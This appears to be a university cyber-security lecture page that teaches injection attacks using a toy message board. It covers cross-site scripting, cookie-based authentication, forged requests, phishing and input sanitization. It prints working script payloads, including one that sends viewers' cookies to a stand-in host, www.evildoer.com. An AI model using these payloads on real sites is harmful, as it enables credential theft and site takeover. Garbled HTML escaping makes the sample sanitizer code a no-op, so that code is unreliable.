http://rona.cs.usna.edu/~smith/msg/mb.html
and enters "Hello World!".
mb.html as rendered by browser | mb.html HTML code |
Message Board
|
<html><body> <h1>Message Board</h1> <hr> <form action="mb.cgi"> <input type="text" name="msg"> <input type="button" onclick="submit()" value="post message"> </form> </body></html> |
http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Hello+World!
<b>smith</b>: Hello World!
into the body of the HTML code. In other words, your
message is inserted literally character-by-character,
prefaced by your username (in bold).
mb.html as rendered by browser | mb.html HTML code |
Message Board
smith: Hello World! |
<html><body>
<h1>Message Board</h1>
<hr>
<b>smith</b>: Hello World!<br>
<form action="mb.cgi"> <input type="text" name="msg">
<input type="button" onclick="submit()" value="post message">
</form>
</body></html>
|
smith
) post the message
I <u>hate</u> waking up early!to the board, the result will be that anyone viewing the message board sees
Check out this picture <img src="http://social-context.org/wp-content/uploads/2011/08/skeptical-cat-is-fraught-with-skepticism1.jpg">And you can post links, and other things as well. I could even, post a script! Suppose I posted the following "message":
<script type="text/javascript">var i = 0; while (i < 100) { document.write("GO NAVY! "); i = i + 1; }</script>
Sometimes data sent in html forms are processed by a server that manages a computer database. If the form input data is not sanitized, a malicious user may be able to trick the database server into revealing some or all of its data by injecting database commands into the form. The language used to interact with databases is called Structured Query Language (SQL), which is why this type of attack is known as an SQL injection attack.
As a result of the attack, the targeted site was immediately shutdown and a few weeks later it was permanently retired.
while (1 == 1)
in the above
code rather than while (i < 100)
? What if I
posted
<script type="text/javascript">document.location="http://www.usma.edu";</script>on the message board? All of these examples show that it is easy to take down the message board, i.e. render it totally inaccessible to anyone, by injecting code into the data that gets sent to the server. This kind of attack is called an injection attack for that very reason, and is a general kind of attack. In fact, we already saw an example of an injection attack when we tricked the guess-a-number game and were able to win in one guess every time. We'll look at several examples of how we can use injection attacks to do more subtle and devious things than just disable the page, and then we'll look at how we can protect a website like the message board against injection attacks.
The obvious way (not the best way!) to do password protection is to have the usernames and passwords stored on the server, and have the user supply them when he asks for protected pages. But what if the whole site is supposed to be protected? One way is to have you provide your username and password every time your browser makes a GET request to the webserver. This is clearly too much of a pain in the neck for us users! Next simplest plan for password-authenticated websites: have your web-browser save your username and password on your machine, so that it can retrieve them and send them automatically with every request it makes to that webserver. That's how the message board works.
The name for locally (i.e. on the browser's machine) stored information associated with a particular website is "cookie". Be aware that these are on your machine and could be misused by bad people. You can disable cookies in your browser, but then all sorts of sites won't work. (Yet another functionality vs. security trade-off!) You can also wipe the browser's cookie memory periodically.
The cookie for page with URL X gets sent with every request to a page in the subtree rooted X's directory. That way you don't have to reenter username and password for each page in a site. Cookies are sent in the HTTP traffic as part of the "GET" request, but not in the URL, simply as additional HTTP info. This is what an HTTP "GET" request with cookies looks like.
document.cookie
. Thus, the
code alert(document.cookie)
inserted into the
message board by any one user will cause everyone
who looks at the page to see their own cookie.
Because the cookie you see depends on who's viewing the
code, not who posted the code. It's like a mirror, in a way.
This point is really important, so let's be concrete with an example. Suppose we have users m16XXXX, m16YYYY and m16ZZZZ with passwords rab, foo and bar respectively. User m16XXXX posts
<script type="text/javascript">alert(document.cookie);</script>to the message board. Now that script is embedded in the message board, i.e. it is client-side script that will be executed by the browser of anyone visiting the message board. Next suppose user m16YYYY visits the message board. Her browser executes the script code put there by m16XXXX and up pops an alert box that says:
uname=m16YYYY&pswd=foo... because her browser has her cookies. Next suppose user m16ZZZZ visits the message board. His browser executes the script code put there by m16ZZZZ and up pops an alert box that says:
uname=m16ZZZZ&pswd=bar... because his browser has his cookies.
<script type="text/javascript">document.location="http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Die+Bart+die!";</script>If he can trick m16YYYY into visiting his webpage, and she happens to have logged into Prof. Smith's message board page already during that browser session, then here's what happens:
GET /~smith/msg/mb.cgi?msg=Die+Bart+die!"
request to the server rona.cs.usna.edu
. Since m16YYYY has
a cookie for that page (from having logged in previously),
her cookie — containing her username and password —
gets sent to the server rona.cs.usna.edu
.
rona.cs.usna.edu
receives the GET
request with m16YYYY's username and password, and so inserts
the message "Die Bar die!" prefaced with m16YYYY's
username.
rona.cs.usna.edu
.
The GET request that caused the message to be posted was sent
from m16YYYY's browser with her username and password, just as
if she'd typed it in the message board webpage herself.
The essence of this kind of attack is that the evildoer sets things up so that the victim's browser executes a script, and that means the script runs with the credentials (username/password in this case) of the victim. It might not seem that serious when we're just attacking the message board. However, what if we did a similar thing with a bank account rather than a message board, and instead of posting a threat we tricked the code we sent caused funds to be transfered?
A Phishing approach is to send out a blanket e-mail to a large number of people hoping that, out of all of them, someone will click on the link and happen to be logged in to the message board at the time. You try to make the e-mail enticing or make it look legitimate, but your real hope is that out of enough people you'll find that someone.
A Spear Phishing approach is to identify one or a small number of targets, do some research on them (e.g. check facebook, twitter, company websites, etc), and craft an e-mail based on that knowledge that they're especially likely to accept as legitimate and, therefore, for which they're likely to click on the link to the evildoer's website.
Of course if an e-mail client (i.e. a program for reading
e-mail) runs scripts embedded in HTML-formatted e-mail, we
don't need the victim to click on anything: we could simply
embed a script in the e-mail that sets
document.location
to the evildoer's website.
In that case, merely opening the e-mail would send you to the
site. For this reason, most e-mail clients refuse to
run Javascript embedded in an e-mail. Hopefully you now see
why!
www.evildoer.com
Here's a nice picture: <script type="text/javascript">document.write('<img src="http://www.evildoer.com/kitten.jpg?' + document.cookie + '">');</script>
img
element:
<img src="http://www.evildoer.com/kitten.jpg?uname=m16YYYY&passwd=foo">... into the body of the message board's HTML code.
www.evildoer.com
to
GET the file /kitten.jpg?uname=m16YYYY&passwd=foo
GET /kitten.jpg?uname=m16YYYY&passwd=foo HTTP/1.1and, lo and behold, he has m16YYYY's username and password!
Here's the sledgehammer approach to sanitizing our message board
input: You can't have any HTML or embedded Javascript
code without < and >, so if we escaped those
characters before putting the message into the message board,
nobody could do an injection attack. There are a variety of
ways to escape them, but since their ASCII values are 60 and
62, the following works: replace < with < and
> with >. Here's a little bit of Javascript code
that does it. Assuming you have a variable msg
that has the original message, this creates
variable newmsg
that has the same string except
that all the <'s have been replaced with <'s, and
all the >'s have been replaced with >'s.
1999 NASA: The $328 million Mars Climate Orbiter was sent into the Mars atmosphere on the wrong trajectory, causing it to disintegrate. The cause: one piece of software assumed it received input in metric units (newton-sec), but was sent data in English units (pounds-sec). |
2001 Multidata Systems: Cancer treatment software calculated radiation dose based on a user-input configuration of lead shielding blocks. Calculations assumed no more that four shielding blocks were used, but the software allowed data for five blocks to be entered. The result: Cobalt-60 gamma radiation overdosing, an unknown number of deaths, and three radiation physicists charged with second-degree murder.
var newmsg = ""; var count = 0; while(count < msg.length) { var nextChar = msg[count]; if (nextChar == "<") newmsg = newmsg + "<"; else if (nextChar == ">") newmsg = newmsg + ">"; else newmsg = newmsg + nextChar; count = count + 1; }Now, would this code be run on the client or on the server? Hopefully by now you realize that it must run on the server, because a bad person could contrive to send the HTTP GET request to the server without going through the client-side validation (just as we saw with server side scripts in the last lesson).
The above approach does secure us from injection attack, but that security comes at a cost. We can no longer use any HTML in our message board postings. That means no posting pictures, no using italics and bold face, and no links. The real trick is to sanitize the input in such a way that we're safe from the bad stuff, but users can still have the power and flexibility to post things like pictures, links, etc. It's a difficult job, however. One of the things you should have walked away from the programming part of the course appreciating is that it's hard to write a program that anticipates all the kinds of inputs that a dumb, sloppy or malicious user might throw at you.